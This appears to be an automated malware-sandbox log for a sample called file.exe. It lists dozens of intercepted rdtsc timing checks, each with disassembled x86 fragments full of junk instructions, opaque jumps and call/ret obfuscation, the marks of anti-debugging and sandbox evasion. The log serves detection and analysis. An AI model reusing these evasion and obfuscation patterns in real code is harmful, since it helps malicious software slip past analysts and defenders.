Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A53DA4 second address: A53DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F0BF8E3D56Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A53DC3 second address: A53DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0BF9145126h 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A53DD5 second address: A53DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A53DE6 second address: A53DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A53DEA second address: A53DEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A53E3C second address: A53E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A53E43 second address: A53E7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0BF8E3D575h 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D1C45h] 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D1C91h], edx 0x0000001d push B6C76264h 0x00000022 je 00007F0BF8E3D584h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53E7F second address: A53F14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145136h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 49389E1Ch 0x00000010 push esi 0x00000011 mov edi, 3F5C253Fh 0x00000016 pop ecx 0x00000017 push 00000003h 0x00000019 jo 00007F0BF9145130h 0x0000001f pushad 0x00000020 mov dx, bx 0x00000023 mov esi, 52A2E0CEh 0x00000028 popad 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D2D9Ch], esi 0x00000031 mov dword ptr [ebp+122D233Bh], edx 0x00000037 push 00000003h 0x00000039 and si, 4B9Bh 0x0000003e mov edx, edi 0x00000040 push 566DF5D3h 0x00000045 push edx 0x00000046 jl 00007F0BF9145128h 0x0000004c push eax 0x0000004d pop eax 0x0000004e pop edx 0x0000004f add dword ptr [esp], 69920A2Dh 0x00000056 mov cl, 6Ah 0x00000058 lea ebx, dword ptr [ebp+12445CB4h] 0x0000005e mov esi, 5373A63Ch 0x00000063 pushad 0x00000064 mov ax, si 0x00000067 sub ecx, dword ptr [ebp+122D2121h] 0x0000006d popad 0x0000006e xchg eax, ebx 0x0000006f push ecx 0x00000070 push ecx 0x00000071 jg 00007F0BF9145126h 0x00000077 pop ecx 0x00000078 pop ecx 0x00000079 push eax 0x0000007a push esi 0x0000007b pushad 0x0000007c js 00007F0BF9145126h 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53F62 second address: A53F70 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53F70 second address: A54002 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov ecx, dword ptr [ebp+122D30EAh] 0x0000000e push 00000000h 0x00000010 xor dword ptr [ebp+122D2000h], edx 0x00000016 push F6D79EDEh 0x0000001b jmp 00007F0BF9145134h 0x00000020 add dword ptr [esp], 092861A2h 0x00000027 jo 00007F0BF9145142h 0x0000002d push ebx 0x0000002e call 00007F0BF9145139h 0x00000033 pop edx 0x00000034 pop edi 0x00000035 push 00000003h 0x00000037 xor dword ptr [ebp+122D24F9h], esi 0x0000003d pushad 0x0000003e mov dword ptr [ebp+122D1F99h], esi 0x00000044 popad 0x00000045 push 00000000h 0x00000047 push 00000003h 0x00000049 and ecx, 2C573321h 0x0000004f call 00007F0BF9145129h 0x00000054 jmp 00007F0BF9145131h 0x00000059 push eax 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54002 second address: A54006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54006 second address: A54016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54016 second address: A5401A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A540EC second address: A54196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145139h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e js 00007F0BF914512Ch 0x00000014 add eax, 7A31BC67h 0x0000001a popad 0x0000001b push 00000000h 0x0000001d call 00007F0BF9145129h 0x00000022 jmp 00007F0BF9145139h 0x00000027 push eax 0x00000028 jmp 00007F0BF914512Dh 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 pushad 0x00000032 jmp 00007F0BF9145137h 0x00000037 jns 00007F0BF9145137h 0x0000003d jmp 00007F0BF9145131h 0x00000042 popad 0x00000043 mov eax, dword ptr [eax] 0x00000045 jng 00007F0BF9145138h 0x0000004b pushad 0x0000004c jmp 00007F0BF914512Ah 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54196 second address: A54217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push edi 0x0000000b jg 00007F0BF8E3D566h 0x00000011 pop edi 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 popad 0x00000017 pop eax 0x00000018 mov di, 2EAFh 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 jp 00007F0BF8E3D56Ch 0x00000026 mov edx, dword ptr [ebp+122D29C4h] 0x0000002c push 00000003h 0x0000002e mov edx, dword ptr [ebp+122D2AF8h] 0x00000034 call 00007F0BF8E3D569h 0x00000039 push edi 0x0000003a push ebx 0x0000003b jmp 00007F0BF8E3D575h 0x00000040 pop ebx 0x00000041 pop edi 0x00000042 push eax 0x00000043 js 00007F0BF8E3D56Eh 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F0BF8E3D576h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54217 second address: A54226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BF914512Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7417C second address: A74183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74183 second address: A741A8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0BF9145128h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0BF9145137h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A741A8 second address: A741C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jng 00007F0BF8E3D584h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A741C8 second address: A741CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ABA0 second address: A3ABAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ABAA second address: A3ABDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 jns 00007F0BF914513Fh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F0BF9145126h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ABDB second address: A3ABDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ABDF second address: A3ABE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A720CA second address: A720E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007F0BF8E3D568h 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F0BF8E3D56Eh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72257 second address: A7225C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A723AA second address: A723AF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7251E second address: A72523 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72CD9 second address: A72D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0BF8E3D585h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72D02 second address: A72D07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72D07 second address: A72D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D571h 0x00000009 jnc 00007F0BF8E3D566h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F0BF8E3D577h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73176 second address: A73194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007F0BF9145136h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73315 second address: A7331B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A738E8 second address: A738EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A738EE second address: A738F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73D23 second address: A73D40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BF9145133h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73D40 second address: A73D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73FC7 second address: A74000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145138h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0BF9145137h 0x0000000e jno 00007F0BF9145126h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74000 second address: A7403B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D577h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F0BF8E3D57Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77D9F second address: A77DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77F93 second address: A77F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77F97 second address: A77F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78119 second address: A7811D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7811D second address: A78123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FB6C second address: A7FB78 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F0BF8E3D566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FB78 second address: A7FB81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FCAA second address: A7FCB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8271F second address: A8272F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8272F second address: A82734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82734 second address: A8275A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BF9145131h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F0BF9145126h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82C8C second address: A82C96 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BF8E3D56Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82D75 second address: A82D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82E21 second address: A82E41 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0BF8E3D576h 0x00000008 jmp 00007F0BF8E3D570h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A831BA second address: A831C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A831C6 second address: A831CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83376 second address: A8337B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83F3A second address: A83F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0BF8E3D570h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83F51 second address: A83FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F0BF9145134h 0x0000000d mov esi, dword ptr [ebp+122D2A50h] 0x00000013 push 00000000h 0x00000015 movzx edi, di 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F0BF9145128h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov si, 299Ah 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c jmp 00007F0BF9145132h 0x00000041 pop ebx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84A62 second address: A84A84 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BF8E3D566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0BF8E3D56Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A860DD second address: A860E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86C30 second address: A86C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39082 second address: A39088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39088 second address: A390A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BF8E3D573h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88185 second address: A88195 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A390A3 second address: A390A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A390A7 second address: A390AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B8C7 second address: A8B8D1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BF8E3D566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CE80 second address: A8CE85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8DFFB second address: A8DFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D088 second address: A8D094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8DFFF second address: A8E01B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D578h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EF0E second address: A8EF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F047 second address: A8F085 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F0BF8E3D574h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0BF8E3D572h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9004D second address: A90053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F085 second address: A8F089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90E9A second address: A90F01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D2B10h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F0BF9145128h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 add edi, 458CAB41h 0x00000036 mov edi, 6A7CBE23h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F0BF9145128h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push esi 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90053 second address: A90057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F089 second address: A8F0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+1243F9F8h], ecx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F0BF9145128h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 jne 00007F0BF914512Ch 0x0000003c mov eax, dword ptr [ebp+122D1539h] 0x00000042 mov dword ptr [ebp+122D264Ah], eax 0x00000048 push FFFFFFFFh 0x0000004a pushad 0x0000004b sub eax, dword ptr [ebp+122D1FBFh] 0x00000051 popad 0x00000052 nop 0x00000053 push ebx 0x00000054 js 00007F0BF914512Ch 0x0000005a pop ebx 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90F01 second address: A90F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F0FB second address: A8F115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145136h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
